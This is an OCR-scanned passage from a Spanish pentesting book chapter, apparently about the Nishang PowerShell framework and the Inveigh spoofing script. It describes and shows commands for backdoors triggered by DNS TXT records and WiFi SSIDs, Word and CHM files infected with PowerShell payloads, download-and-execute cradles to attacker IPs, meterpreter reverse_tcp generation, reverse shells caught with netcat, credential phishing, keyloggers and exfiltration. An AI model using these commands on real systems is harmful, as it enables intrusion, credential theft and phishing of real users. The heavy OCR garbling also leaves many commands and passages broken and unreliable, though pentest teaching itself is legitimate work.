Esta  funcion  lanza  un  payload  el  cual  permite  programar  cuand^ - 

se  ejecutaran  las  instrucciones  remotas.  Cuando  sc  cumpla  la  hora 
programada  la  funcion  descargara  el  script  de  PowerShel! y  lo  eiecutara 

Un  ejemplo  seria  Execute-OnTime  -PayloadURL  http://pastebin.com/nnv. 
php.  t—Zhyjonvh  -Arguments  Get-Information -Time  hh.mm  -CheckURI 
_  http://pastebin.  com/rawpbp? i=Zhy/8rwh  -StopStrine  stnnn^t / 

Gupt-  B  ackdoor 

Esta  funcion  proporciona  una  backdoor  que  es  capaz  de  leer  ios~ 
comandos  de  PowerShel/  a  traves  de  los  SS1D  de  las  redes  Wireless  que  se 
encuentran  alrededor.  Un  ejemplo  seria  Gupt-Backdoor  -MagicString  0p3n 
Verbose,  donde  la  funcion  buscara  el  SSID  que  comienza  con  op  1,  Si 
se  quiere  ejecutar  un  comando.  por  ejemplo  whoami.  el  nombre  de  la  red 
Wireless  deberia  ser  op3ncwhoami 

Add- 

ScrnSave  Backdoor 

Esta  funcion  ejecuta  una  backdoor  la  cual  puede  utilizar  Windows  Screen 

Saver  para  ejecutar  comandos  y  scripts  remotos 

Invoke - 

ADS  Backdoor 

Esta  luncion  ejecuta  una  backdoor  la  cual  puede  utilizar  ADS.  Alternate 

Data  Streams,  y  el  registro  de  Windows  para  lograr  persistence 

Tahiti  3.40:  Funciones  tic  Backdoor  en  X is  hang. 


bste  modulo  proporciona  funciones  que  pennite  crear  archives  de  tipo  Word.  Excel,  JAR  con  los  uue 
se  pueden  ejecutar  instrucciones  de  PowerShel!  a  traves  de  cllos.  HI  modulo  consta  de  6  funciones 
los  cuales  pueden  ser  ut.I.zados  por  el  pen, ester  para  engaflar  a  otros  usuarios  y  conseguir  ejecutar 
instrucciones  en  una  maquina  y  obtener  un  privilegio.  A  continuacion  sc  describen  las  funciones  de 


Funcion 

Description 

Out-CHM 

F.sla  funcion  permite  crear  arc  hi  vos  con  extension  GHM.  los  cuales 
se  encuentran  infectados  pudiendo  ejecutar  comandos  y  scripts  de 
PowerShel t.  Un  ejemplo  seria  Out-CHM -Puvload  "Get-Process" 
-HHCPath  "C:\Program  Files  (x86)\HTML  Help  Workshop",  donde  se 
myecta  cl  comando  Get-Pmcess  en  el  interior  del  fichcro  cuando  este  sea 
abierto.  Un  ejemplo  valido  seria  conseguir  ejecutar  una  shellcode  al  abrir 

este  tipo  de  fichero 
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Funcion 

Descripcion 

Out-Word 

Esta  funcion  crea  un  archive  de  Wordy  lo  infecta  para  ejecutar  comandos  y 
scripts  de  PowerShell.  Como  primer  ejemplo  se  puede  visual izar  este  Out- 
Word  -PayloadURL  http://youwebserver.com/evil.psl  -Arguments  Evil 
con  el  que  con  el  parametro  PayloadURL  se  indica  de  donde  se  descargara 
el  script  al  abrir  el  fichero  y  con  el  parametro  Arguments  se  le  pueden  pasar 
argumentos,  por  ejemplo  para  invocar  una  funcion  que  se  encuentre  en  el 
interior  del  script.  Otro  ejemplo  seria  Out-Word -Payload  “ PowerShell.exe 
-ExecutionPolicy  Bypass  -noprofile  -noexit  - c  Get-Process  .  el  cual  crea  un 
fichero  de  Wordy  cuando  este  se  ejecute  se  ejecutara  la  macro  a  traves  de 

PowerShell 

Out-Excel 

Esta  funcion  crea  un  archivo  de  Excel  y  lo  infecta  para  ejecutar  comandos  y 
scripts  de  PowerShell.  Esta  funcion  es  similar  a  la  denominada  Out-Word 

Out-HTA 

Esta  funcion  permite  crear  un  fichero  HTA  cl  cual  puede  desplegada  sobre 
un  servidor  web  y  utilizado  en  campafias  de  phishing 

Out-Java 

Esta  funcion  permite  crear  un  fichero  JAR  firmado.  el  cual  puede  ser 
utilizado  como  applet  para  ejecutar  comandos  y  scripts  de  PowerShell 
Como  puede  visualizarse,  este  fichero  es  otra  via  para  realizar  un  client- 

side 

Out-Shortcut 

Esta  funcion  permite  crear  un  fichero  de  aeceso  directo,  cs  decir  con 
extension  .Ink.  el  cual  permite  la  ejecucion  de  comandos  y  scripts  a  traves 

de  PowerShell 

Tahla  3.41 :  Funciones  de  Client  en  Ms  hang. 


Execution 

Esia  categoria  o  modulo  de  Nishang  permiten  al  pentester  descargar  codigo  a  traves  de  diferentes 
protocolos.  permitiendo  la  ejecucion  de  codigo  y  de  scripts.  A  continuacion  se  dcscnhen  las 
funciones  de  este  modulo. 


Funcion 


Descripcion 


Download - 
Execute- PS 


Esia  funcion  descarga  y  ejecuta  un  script  de  PowerShell  en  memoria. 

Un  ejemplo  seria  Download-Execute-PS  http://domimo.com/sa-ipt.psl 
-Argument  script.  En  este  ejemplo  se  descarga  el  script  desde  una  ubicacion  y 
se  ejecuta  la  funcion  que  se  indica  en  Argument _ 


Download 

Execute 


Esta  funcion  permite  descargar  un  ejecutable  en  formate  texto,  convertirlo  a 
ejecutable  y  entonces  ejecutarlo.  Puede  ser  una  buena  solucion  para  evadir 
mecanismos  de  red  que  puedan  evitar  que  la  descarga  llegue  a  la  maquina 
donde  se  encuentra  el  pentester  Un  ejemplo  seria  Download  Execute  http. 

example,  com/ file,  txt _ _ _ 
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Funcion 

Descripcion 

Execute- 

Command- 

MSSQL 

Esta  funcion  permite  ejecutar  comandos  de  PowerShell.  comandos  native  ,1. 

cmdo  comandos  SQL  sobre  un  MSSQL  Server  con  los  privileges  suficientes 

Execute- 

DNSTXT-Code 

Esta  funcion  permite  ejecutar  una  shellcode  en  memona  utilizando  consults 
a  registros  TXT  de  un  servidor  DNS  configurado  por  el  pentester 

Tahla  3.42:  Funciones  de  Exeat!  ion  en  Nishang. 


oauier 


Este  modulo  cngloba  funciones  que  permiten  realizar  recopilacion  de  informacion  sensible  o  jueosa 
de  la  maquina  comprometida.  Funciones  que  permiten  extraer  los  hashes  dc  la  maquina  recopilar 
informacion  sobre  las  redes  malambricas  a  las  que  se  conecla  la  maquina,  extraer  las  contrasenas  en 
piano  o  incluso  realizar  un  ataque  de  phishing  de  credenciales  en  sistemas  Windows.  A  continuacion 
se  describen  las  funciones  pertenecientes  al  modulo  de  Gather. 


Funcion 

Descripcion 

Check- VM 

Esta  funcion  chequea  si  se  esta  ejecutando  en  un  entorno  de 
maquina  virtual  o  no  hay  n ingun  entorno  de  virtualizacion 
corriendo 

1  n  voice-  Credential sPhish 

Esta  funcion  lanza  una  ventana  de  login  interactive  la  cual 
reportara  lo  que  el  usuario  introduzca  en  texto  piano  al 
pentester.  Esta  funcion  es  un  ataque  de  phishing.  Conseguir  las 
credenciales  en  remoto  a  traves  de  este  engano  es  viable 

t  ireBuster  &  FireListener 

Este  par  de  scripts  ayudan  a  realizar  egress  testing.  En  otras 
palabras,  cuando  el  pentester  consigue  acceso  a  un  equipo  y 
quiere  verificar  si  desde  este  se  puede  acccder  a  Internet  o  a  otra 
red  en  cualquier  puerto.  Con  FireListener  se  abren  puertos  y  con 
FireBuster  se  intenta  conectar  con  dichos  puertos 

Get-Information 

Esta  funcion  recopila  informacion  jugosa  desde  un  equipo.  La 
informacion  dependent  de  los  privilegios  con  la  que  se  cjecute 
la  funcion.  A  modo  de  resumen  se  puede  encontrar  aplicaciones 
instaladas.  informacion  sobre  redes  inalambricas.  usuarios  y 
grupos  locales,  politica  de  cuentas.  informacion  sobre  SNMP, 
recursos  compartidos,  hosts  y  sesiones  de  Puttv,  etcetera 

Copy- ESS 

Esta  funcion  copia  el  fichero  SAM  utilizando  Volume  Shadow- 
Copy  Service.  De  este  modo  se  pueden  copiar  ficheros  que  estan 
protegidos  o  bloqueados  por  el  sistema.  Hay  que  tener  en  cuenta 
que  habra  que  tener  pemiisos  para  ejecutar  I  SS 

PowerShell 


Funcion 

Descripcion 

Get-LSASecret 

hsta  tuncion  exuac  iub 

Esta  funcion  extrae  los  nombres  de  usuario,  identilicador  y 

Get-PassHashes 

hashes  LM  y  NT  del  fichero  de  cuentas  SAM 

Get-WLAN-Keys 

Esta  funcion  recopila  information  sobre  las  redes  inalambricas 
almacenadas  en  el  equipo 

Kevlogger 

Esta  funcion  permite  capturar  las  pulsaciones  de  teclado  desde 
una  maquina  comprometida 

~  »  i*  .  j _ _ _  a**  pn  tp\tn  nlano  en 

Windows  Server  2012 


Tabla  3.43:  Fund  ones  de  Gather  en  Nishang. 

Pivot 

l-ste  modulo  proporciona  funciones  para  la  realizaci6n  de  pivoting  entu 
funciones  presentadas  son  realmente  utiles  en  la  fase  Ae  post-exploitation,  y 
a  llegar  a  mas  sitios.  donde  quiza  al  comienzo  del  proceso  no  podia  llegar. 

A  continuacion  se  describcn  las  funciones  que  forman  cl  modulo  Pivot. 


Funcion 

Descripcion 

Create- Mu! tipi eSess  ions 

Fsta  funcion  permite  al  penlester  chequear  las  credeneiales  sobre 
diferentes  maquinas  v  crear  diferentes  PSSessions  en  Powershel. 

Esta  es  una  de  las  vias  para  pivolar  a  traves  de  las  redes  y  de 
diferentes  maquinas.  Un  ejemplo  seria  Create-MullipleSessions 
- filename A servers,  txl  -CreateS essions 

Rim-EXEon  Remote 

Esta  funcion  permite  copiar  y  ejecutar  un  fichero  sobre  diferentes 
maquinas.  Es  similar  a  lo  que  se  puedc  llevar  a  cabo  con  las 
PSTools 

In  voke-NetworkRela y 

Esta  funcion  permite  gestionar  relay’s  a  nivel  de  red.  Trabaja  a 
nivel  de  IPv4  e  IPv6,  inciuso  permite  hacer  v6tov4.  Un  ejemplo 
seria  Invoke-NetworkRelay -Relay  v4tov4  -Listen Address 

192.1 68. 254. 1 4 1  -Listen port  8888  -Connect A ddress  1 92. 168.1. 22 
-ConnectPort  445  -ComputerName  1 92. 1 68.254. 141.  Se  ahade  un 
relay  el  cual  escucha  por  IPv4  y  reenvia  lo  que  llega  al  pueto  44o 

Tabla  3.44:  Fundones  de  Pivot  en  Nishang. 
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Este  modulo  proporciona  diversas  funciones  que  ayudan  a  obtener  una  PowerShell  interacliva  a 
traves  de  dlferentes  protocolos.  como  pueden  ser  TCP.  UDP,  HTTP  o  ICMP.  Inciuso  se  nueden 
ejecutar  ordenes  sobre  PowerShell  apoyandose  en  servicios  como  Gmail  para  transferir  las  ordenes 
A  continuacion  se  dcscriben  las  funciones  del  modulo  Shells  y  se  muestran  alnunos  pequenos 
ejemplos  de  ejecucion.  w  y  4 


Funcion 

Descripcion 

Invoke-Po  werShellTep 

Esta  funcion  es  muy  polente  proporcionando  una  PowerShell 

interactiva  en  remoto,  ya  sea  a  traves  de  una  conexion  hind  o  reverse. 
Un  ejemplo  de  ejccucion  seria  Invoke-PowerShel/Tcp  -IPAddress 
<direccion  1P>  -Reverse  -Port  <numero  pverto>.  Por  otro  lado  el 
atacante  podria  configurer  en  su  maquina  un  netcat.  por  ejemplo  con 
nc  -I  -p  <mmero  puerto> 

Invoke-PsGcat 

Esta  funcion  permite  enviar  comandos  y/o  scripts  a  una  enema  de 

Gmail.  Esta  tuncion  es  ejecutada  desde  la  cuenta  del  atacante  o 
del  penlester  y  configure  los  datos  de  la  cuenta.  Por  otro  lado  se 
utilizara  la  funcion  Invoke-PsGcatAgent  o  Powereat  sobre  la  maquina 
objetivo.  Estas  funciones  realizaran  la  descarga  del  comando  o  del 
script  y  se  ejecutara 

f m  oke- Ps  Gear  A  gent 

Ejecuta  comandos  y  scripts  los  cuales  son  enviados  por  Invoke- 

PsGcat 

In  voke-PowerShellifdp 

Esta  funcion  proporciona  la  posible  ejccucion  de  una  PowerShell 

interactiva,  tanto  en  modo  bind o  revet'se ,  ejecutandose  a  traves  del 
protocolo  UDP 

In  \  vke-PoshRatHttps 

Esta  funcion  proporciona  una  PowerShell  interactiva  inversa  a 

traves  de  HTTPS.  Un  ejemplo  de  ejecucion  es  Invoke-PoshRatHttps 
-IPAddress  1 92.  / 68.56. 1 01  -Port  8443.  niientras  que  en  el  clienle  se 
ejecuta  [System. Net.ServicePoint Manager] : :ServerCertificateValidati 
onCallback  { Struef.iex  (New-Object  Net.  WebClient).DownloadStri 
ngf  https:// 192.1 68.56. 1 0 1 : 8443/connect  "l 

Invoke-PoshRaiHttp 

Esta  funcion  proporciona  una  PowerShell  interactiva  inversa  a 

traves  de  HTTP.  Un  ejemplo  de  ejecucion  cs  Invoke-PoshRatHttps 
-IPAddress  192.168.56.101  -Port  80.  mientras  que  en  el  cliente 
se  ejecuta  lex  (New-Object  Net.WebClient/.DownloadSlring 
(  http://192.168.56. 101/connect  j 

Remove-PoshRat 

Esta  funcion  limpia  el  sistema  despues  de  utilizar  Invoke- 
PoshRatHttps 

1 n  i -oke-P o  h  • erShell  Wmi 

Esta  funcion  proporciona  una  PowerShell  interactiva  utilizando  WMI 
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Funcion 

Description 

Invoke-PowerShel  l  / cmp 

Esta  funcion  proporciona  una  PowerShell  interactiva  a  traves  del 

protocolo  ICMP.  Por  ejempio.  sobre  una  maquina  Linux  controlada 
por  el  pentester  se  puede  utilizar  icmpshni.py ,  el  cual  es  parte  de 
las  icmpsh  tools.  En  primer  lugar  sc  ejecuta  sysctl -w  net.ipv4.icmp 
echo  ignore  all =1  y,  posteriormente,  se  ejecuta  python  icmpsh  jn.py 
<direccion  IP pentester>  <direccidn  IP  taiget>.  Una  vez  realizado 
esto  se  ejecuta  en  el  target  la  instruccion  Invoke-PowerShelllcmp  - 
IPAddress  <direccion  IP  pent ester> 

Tab  to  3.45:  Ftmeiones  de  Shells  en  Nishang. 

Utility 

Este  modulo  de  Nishang  proporciona  tunciones  que  pueden  ayudar  al  pentester  a  reali/ar  algunas 
acciones.  Este  grupo  de  utilidades  proporcionan  persistence  a  los  scripts,  permite  realizar  descargas 
de  ficheros  o  encodear  y  decodear  scripts  o  strings.  Esta  ultima  parte  es  muy  impoi tante  ya  que  se 
puede  juntar  con  la  parte  de  shells  con  el  fin  de  ejccutar  inslrucciones  mas  complejas  a  traves  de  los 
EncodedCommand.  A  continuacion  se  describen  las  ftmeiones  del  modulo  Utility'. 

Fun  cion 

Descripcion 

Add-Exfiltration 

Esta  fimeion  permite  aiiadir  la  capacidad  de  filtrar  datos  a  traves  de 
Gmail,  Pastebiiu  un  servidor  web  o  DNS 

Add-Persistence 

Esta  funcion  anade  persistencia  al  script 

Remove-Persistence 

Elimina  la  persistencia  dc  un  script,  la  cual  fue  anadida  previamente 
por  Add-Persistence 

Do-Exfiltration 

Esta  funcion  proporciona  capacidades  dzpipe  en  su  salida 

Download 

Esta  funcion  proporciona  descarga  de  ficheros  hacia  la  maquina 
comprometida 

Parse  Keys 

Esta  funcion  parsed  palabras  clave  recogidas  previamente  por  el 

keylogger 

tnvoke-Encode 

Esta  funcion  encodea  y  comprime  un  script  o  un  string 

Invoke-Decode 

Esta  funcion  decodea  y  descomprime  un  script  o  un  string 

Tablet  3.46.  Funcioues  de  Utility  en  Nishang. 

PoC:  Backdoors,  jugando  con  DNS  y  Wireless 

En  esta  prueba  de  concepto  se  hablara  sobre  las  backdoors  que  Nishang  proporciona.  especialmente 
sobre  las  que  sc  encapsulan  a  traves  del  protocolo  DNS  y  la  que  puede  comumcarse  con  los  bbiu 
de  las  redes  Wireless . 


Caphulo  III.  PowerSheUpu m:  El  arte  del  pentesting 


179 


|J'  “‘,c;  cjemP'°  Preseniado  es  cl  de  la  backdoor  que  uttliza  cl  protocolo  n\K  p  . 
PreSe"  dd°  P°r  61  aUt0r  de  NishanS  en  una  de  las  conferencias  donde  presenter  fi-am^k . 


Para  llevar  a  cabo  esta  prueba  se  necesita  que  el  pen/ester  tenea  el  control  h* 
mampulable.  En  este  servidorDNS  creara  un  registro  TXT  especial  con  e  com  *  SCrV'dor  °NS 
Nishang  proporciona  ana  fu„ci6n  denominada  0,„-D„sT,,  d.„,ro  dc  l^oria”,!,"' 

fiazfs: srr.  ~ 0 

longilud  da  cad,  ,.giilfo  TXT  as  de  c 


TXTC^ecordacIuldUfItn!^sinSfeasTSb3C°de  Get^ocess 
c08t0Q0Oyk9OLS7m5QIA  S1"9le  subdomain. 

PS  C:\n?Chano£ltten  to  C:Snisharig\encodedtxt.txt 


-IsSt ring 


Fig.  3.45:  Ob'encion  de  insm.caon  encodeada  para  atmacenarta  enmdZgbZZ^n 


5=S£3=SS=2£t~kS 


1.64 

"pVRLbsUgDNxX6k264A/vOEm/ 

t  script 

"dZJRa9swEMf!BfoOh5uHBGa7e 

264 

,'YG6rsJJFN8XJyQGCIACYeoao' 

2  script 

"Ko6lrGf5ZfEpXy85yws4H/sOJkF 

364 

,3  script 

"9ft  bE4F  T  jcUHmCsb2M60DATF 

"R0Wr8EH5jL58z/dm!Eg/NochP  1 

command 

“Get-Process" 

encscript 

"xVttc9s4kv6cVOU/4BTNrjSRGJ. 

peri 

“cGVybCAtT  UIPIC1IICckcD1mb3 

start 

"starts  cript" 

stop 

"stop" 

hig.  3.46  Configuracidn  del  servidor  DNS. 
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Applied:  All  User  Profile 
Profile  information 

Vers  ion 

Type 

Name 

Control  options 

Connection  mode 
Network  broadcast 
|  AutoSwitch 

Wireless  LAN  ; 

Hotel  - -  i 

Connect  Snl^if  *  this  Network  is  broadcasting 
Do  not  switch  to  other  networks 

Connectivity  settings 

1  Number  of  SSIDs 

1  SSID  name 

i  Network  type 

!  Radio  type 

|!  Vendor  extension 

-Hotel 

Inf rastructure 
[  Any  Radio  Type  J 
:  Not  present 

Security  settings 

Authent icat ion 

Cipher 

|  Security  key 

:  WPA2-Personal 

:  CCMP 

FI  seeundo  ejemplo  presenlado  es  el  de  la  backdoor  que  recibe  los  comandos  a  traves  del  SSID  de 
I  mn  cZZ  » la  miquina  compro„K,,da.  La  tafetoor  denomi™!.  C.p.  pornq.e  ajecpar  los 
comandos,  como  se  menciona  anteriormente,  a  traves  de  la  lectura  de  los  SSID. 

Gup,  cheques  todas  las  redes  Wireless  de  su  alrededor  para  encontrar  un  patron  adecuado.  La 
busqueda  dc  redes  la  realiza  cada  5  segundos. 

La  ronoion  ha«  hinc.pi*  on  2  panes  0 

MMcSirimt  de  4  caracteres  dc  longitud.  el  cual  es  ut.l.zado  para  identificar  el  SSID  que  contra* 
los  comandos,  el  segundo  se  corresponde con  el  quinto  caracter.  cl  cual  ay  u  a  a  ec i  >rsi  sc  qu_  ^ 
ejecular  un  eomando  o  descargar  y  cjecutar  un  script.  El  quinto  carac  er  c  e 
quiere  ejecular  un  eomando.  o  una  "u”  si  se  quiere  descargar  un  script  y  ejecutat. 

Para  ejemplificar  esto  se  van  a  presentar  2  pequenos  ejemplos.  el  primero  configurando  un  SSID 
el  que  Gupt  ejecutara  un  eomando  y  un  segundo  descargando  un  script  y  ejecu  anc  o 

Si  e.  pen, ester  conftgura.  ya  sea  a  traves  de  su  dispositive  movilo  de  un  puntc,  de  ^ocontrojado 
nor  6\  un  SSID  con  el  siguiente  nombre  " pableget-pmcess  .  A1  ejecular  la  instruccic 

Backdoor  Coandol. 

para  vor  silos  pnmoros  4  oaracl.res  del  SSID  »«»<*•«„  con  o  Sn  co nhp  .redo  A  ^ 

funcion  encuentre  un  SSID  valido  comprobara  el  quinto  caracter  y  al  encontrar  j 

eomando  que  va  despues,  en  este  caso  Get-Pmcess. 
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IUERB0SE 

lUERBOSE 

UERBOSE 

VERBOSE 

UERBOSE 

UERBOSE 


Checking  wireless  networks  for  instructions. 
Checking  wireless  networks  for  instruct  ions . 
Checking  wireless  networks  for  instruct  ions _ 
Checking  wireless  networks  for  instructions. 
Found  a  network  with  instructions? 

Command  "get-process "  found.  Executing  it. 


handles  NPM<K> 


50 

275 

259 

1079 

328 

680 

70 

226 

103 

262 

50 

36 

33 

52 

936 

882 

140 

122 


4 

20 

12 

31 

22 

28 

8 

22 

11 

26 

6 

5 
5 
7 

15 

27 

12 

10 


Ph<K> 


2008 

4564 

13392 

56176 

13228 

16200 

3416 

6100 

3244 

29992 

2784 

2580 

2012 

3900 

3656 

5084 

3272 

4112 


W?<K>  UM<M>  CPU<s>  Id  ProcessName 


236 

980 

348 

656 

4228 

14900 

992 

776 

1380 

24452 

552 

256 

4084 

8212 

2840 

69040 

3300 

1832 


14 

73 

234 
174 
129 
108 

33 

49 

72 

102 

57 

48 
27 
66 

49 

235 

56 

57 


12.82 


0.59 


0.03 


0.11 


2124 

2096 

612 

532 

5332 

2152 

3836 

3736 

5344 

2836 

4100 

9016 

11752 

12252 

304 

1004 

2188 

9096 


AERTSr64 

arnsvc 

augesrua 

augrsa 

avgtray 

augwdsuc 

®Jfj£AnPPalSeruice 

BTHSSecurit yMgr 
bt playerctr 1 
capiws 
conhost 
conhost 
conhost 
conhost 
csrss 
csrss 
deumonsrv 
dllhost 


Fig.  3.4 $:  Ejecucion  de  comandos  a  (raves  dc  la  red  IVif 


Ahora.  si  se  quiere  lograr  la  ejecucion  de  scripts  Gupt  descargara  y  ejecutara  un  script  si  el  quinto 
caracter  del  nombre  de  la  red  es  “u~.  Despues  dc  la  “u”  se  debe  encontrar  la  parte  de  una  direccion 
URL  recortada  con  Google  URL  shortener. 

Ln  otras  palabras.  y  a  niodo  de  ejemplo,  si  el  SSID  es  “ pablunJEuug la  direccion  URL  seria  http: 
goo.gl/nJEuug  para  descargar  y  ejecutar  el  script.  El  script  se  ejecutaria  en  memoria  directamentc. 
El  paramelro  Arguments  permite  pasar  argumentos  al  script  descargado.  Un  uso  interesante  seria 
tener  cl  script  Invoke-Shelkode,  por  ejemplo.  y  descargarlo  a  traves  de  la  direccion  URL  pasada  a 
traves  del  SSID. 


ncDDf\£i:  £J,ecMn?r  wifeless  networks  for  instructions. 

LicbSRoI:  Checking  wireless  networks  for  instructions. 
mcddaph  Checking  wireless  networks  for  instructions. 
ucbSSoi:  Checking  wireless  networks  for  instructions, 
iicbbooc  CJieekancr  wireless  networks  for  instructions. 

..£bb!;o£:  Checking  wireless  networks  for  instructions. 

*cjBOSE:  Found  a  network  with  instructions? 

1624  SE:  Downloadin«  t,,e  Attack  script  and  executing  it  in  memory. 


Fig.  3.49:  Descarga  de  script?  ejecucion  a  traves  de  SSID  de  red  WiFi. 


PoC:  Client-Side  Attack  con  Nishang 

Ln  csta  pmeba  de  concepto  se  presenta  el  concepto  de  Client-Side  utilizado  desde  PowerSbdi.  Es 
cierto  que  Nishang  proporciona  fttneiones  quo  perm i ten  crear  ficheros  que  pueden  ser  utilizados 
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para  ejecutar  instrucciones  una  vez  son  abiertos.  Este  tipo  de  ficheros  son  ideales  para  enviar.  poi 
ejemplo,  por  correo  electrdnico  o  hacer  llegar  de  alguna  manera  a  la  victima. 

El  ejemplo  esta  presenlado  por  el  autor  de  Nishcmg  en  su  sitio  web.  En  este  pequeflo  ejemi 
puede'omprender  como  va  creando  diferentes  ficheros  de  H Prd,  los  cua.es  Uenen  comandos  en  su 
interior  que  permiten  ejecutar  instrucciones  tras  abrirlos. 

En  primer  lugar,  la  ejecucion  de  Out-Word  -Payload  "PowerShell.exe  -ExecutionPolicy  Bypass 
-noprofile  -noexit  -c  Get-Process  ”  proporciona  un  fichero  que  ejecutara  un  proceso  Power  te  y 
lanzara  la  instruccion  Get-Process.  Esta  primera  ejecucion  es  una  prueba  bastca  de  la  funcion. 

La  segunda  prueba  que  se  muestra  es  la  siguiente  Out -Word  -PayloadURL  http://192.168.56.Wl/ 
PowerShell  ?payload.psl .  El  payload  es  cargado  desde  una  ubicac.on  externa  y  el  psl  podna  ser 
cualquier  tipo  de  cod igo.  por  ejemplo  una  Meterpreter  generada  de  la  siguiente  manera  mjpayload 
>\Mndows/x64/meterpivter/reverse_tcp  LHOST-192.168.56.W1  exitfunc-thread  R  |  Msfencode  -t 
psh  >  PowerShell _payIoad.ps  1 . 

El  ultimo  ejemplo  mostrado  es  el  siguiente: 

Invoke-Encode  .\Get-WLAN-Keys.ps!  -  PostScriptCommand:  Out-Word -Payload  powershell 
■ExecutionPolicy  Bvpass  -  noprofile  -c  Invoke-Expression  $(New-Object  IO.StreamReadei 
rX  '  '  10- Compression. DeflateStream  ($(New-Object  JO.^morySn^m 

E$( [Convert]  ::FromBase64String('  dZJRb9 Mw' EMffLJk7 nil +tBJJxhNSRSuVlJVC10kZL0 

UCAJje5xmaOHdmXtdPGd8dpqmnA8ltl3/l//:\7dqOpSFkDH5Hia)  i  fin -  J‘  ~ 

nWlz^vJFitlKeSlXIBZm4 1  laUsJeqkFC2dePhthPtrlPr5WwFjbM7pdEnnAXC+3l+cbXINo 

v  I  irON  VB6aE  +  GZ  VhkoNA  oHhAc6kry4w/lf3kbik  7xuPcE  WwbUGds  7WIDylslZGeXK  C  A 
o  MsVEh  1  OdS  5  9  PX Mv8  vv +Zcs5Zl  kO077vYHLs+  xhfL  laXn  Em  iZpymjfWysCU  nil  IX p  6z]n  .i 

UEhlClSLbbpl  BI6kUdDIWX9jYl/TNxdjbtcN8u61IjvVOmVKYajn4EX+FEDcNRF4awBvv 

W7li4mYJC8hO4EAbV/6hseIUeNBcU5uUCBOBNE6AxEM63hs0cHWZ8bhdwPlqEoZLze/ 

gwaeBjCJBvbK4ejXydPPDTWURmqDsanCl6UXmGjRYHDqJP9bdfdwRiiVwPTavOS/  MicP2f+t()sj 

apxEg5uo+6zJcRx6IGdh/3NAp8HE3I0J6+27h(hvQJz9Bg=  =  ")))), 

IO.  Compression.  Compression  Mode] :  -.Decompress)). 

[Text. Encoding]:: ASCII)). ReadToEndO:  . 

En  este  caso,  se  encodca  el  script  que  se  quiera  para  evitar  la  comunicacion  con  Internet. 

PoC:  Shells  ,  . 

En  esta  prueba  de  concepto  se  estudian  el  concepto  de  shells  dtsponible  en  Nishang. 
ol'rece  varias  formas  para  eonseguir  una  shell  a  traves  de  diferentes  protocolos  y  fu 

PowerShelL 

Para  la  realizacion  de  la  prueba  de  concepto  se  utilizara 

proporciona  una  PowerShell  interactiva  en  remoto.  En  el  modulo  Shells  se  dispont 
que  proporcionan  la  misma  funcionalidad  a  traves  de  otros  protocolos. 
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-  sentencia  a  ejecutar  por  el  pentester  o  por  un  script  ejecutado  de  alguna  manera  sobre  una 

npqU,'ormnmrPr0mCllda  ^  ‘3  SlgUien.te Invoke- PowerShellTcp  -Reverse -IPAddress  192.168.56.101 
oi  Esto  generara  una  peticion  inversa  hacia  la  direccion  IP  1 92. 1 68.56. 1 0 1  y  puerto  9000 

donde  debe  existir  una  ejecucion  de  netcat  o powercat  para  recibir  la  PowerShe/l  interactiva. 


<c>  2012  Microsoft  Corporation.  Todos  los  derechos  reseruados. 
C:\Users\pgonzalez >cd  Desktop 
C:\Users\pgonzales\Desktop>nc  -1  -p  9000 

nc  no  se  reconoce  cono  un  conando  interno  o  externo 
piograna  o  archivo  por  lotes  ejecutable. 

C:\Users\pgonsalez\Desktop>cd  nc 
C:\Users\pgonzalez\Desktop\nc >nc  -1  -p  9000 

fcopy°iyht°<C>  m  ™nni"S  f  user  Pablo  .Gonzalez  on  PllP-07 
^opyugiit  <C>  2015  Microsoft  Corporation,  fill  rights  reserved 


IPS  D:\libros\pentesting  powershell\nishang-naster>get-process 


Handles 

NPMCJO 

PM<K> 

WS<K> 

UM<M> 

CPll<s> 

Id 

ProcessNane 

161 

ce 

19 

3100 

9432 

98 

5,61 

1872 

OppleMobileDeu iceSerui 

75 

7 

1104 

3728 

44 

0,03 

1752 

arrosvc 

Fig.  3.50:  Ob  tendon  de  PowerShell  inversa  interactiva  en  remoto. 


7.  Otros  scripts  en  accion 

En  este  apartado  se  agrt.pan  otros  scripts  recopilados  que  pueden  ser  utilizados  en  un  pentest.  Estos 
sci  ipts  pueden  no  formar  parte  de  un  framework,  pero  su  utilidad  es  indudable  en  un  test  de  intrusion. 


PoC:  Sniffing  y  Spoofing  de  protocolos  con  PowerShell 

Inveigh  es  un  script  de  PowerShe/l  el  cual  pemiite  realizar  diferentes  spoofs  de  cara  un  test  de 

'  C.°m0  Se  ha  'Ttencionado  ya  en  este  libro,  pueden  existir  eseenarios  limitados  por  Io  que 

tcntr  estas  funcional.dades  a  traves  de  la  linea  de  comandos  del  sistema  puede  ayudar  a  lograr  el 

xito  en  estos  eseenarios  diticiles.  Este  script  puede  ayudar  a  realizar  ataques  de  phishing,  ataques 

‘  r.^es  e  ,sPosltlvos  USB,  ayudar  a  obtener  informacion  que  permits  pivotar  entre  VLANes. 
ticcitrs. 

f,ZZP>'  AUe,de rrdeSCrd0 dCSde la SigUiCnte direcci6n URL https J/github. com/Kevin-Robertson/ 
.  A  men|,e  da  s°Porte  Para  direcciones  IPv4,  spoofing  LLIVTNR/NBNS  y  captura  de 
enge.  I  espouse  e  HTTP/SMB.  Para  realizar  la  captura  del  desaflo-respuesta  de  SMB  y  HTTP 
se  reahza  un  sniffing  sobre  el  servicio  SMB  de  la  maquina,  mientras  que  cn  el  caso  de  FITTP  se 
configure  un  listener  dedicado. 
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Hay  que  tener  en  cuenta  que  si  se  copian  y  pegan  los  challenge/response  " 

sJ.pl  los  cuales  son  almacenados  en  un  fichero  de  texto  por  el  prop.o  script. .  se  deben 

retornos  de  carro. 


FI  uso  es  senciilo  en  primer  lugar  se  debe  tener  en  el  proceso  el  maximo  privilegio.  por  ejemplo 
loarando  una  cuenta  de  System  a  traves  de  una  elevacion  de  privilegio.  Puede  ser  necesano  utilizar 
uifmelodo  de  de  ia  politic.  de  ejeeucion  de  scrip,, 

Inveigh.ps  1  f-i  ^-direction  IP  por  la  que  esnifary  spoof ear>  -LLMNR  y\n  NBNh  y\n 
0  03  4  IB -HTTP  v| n  -SMB  y|«  -Repeat y\n  ForceWPADAuth  y\n  Output  0,1.2].  En  a  .magen 
se  puede  visuabzar un  pequeno  ejempio  de  la  captura  de  desafio-respuesta  de  un  hash  a  traves  de 
servicio  SMB  de  la  mdquina.  Esta  maquina  puede  ser  local  o  remota,  ya  que  con 
podria  ejecutar  de  forma  sencilla  este  script  en  otra  ubicacion,  siempre  y  tuan 


PS  C:MJccrs\pablo\DcektopNlnueigh-r»aster>  .Mnucigh.psl 

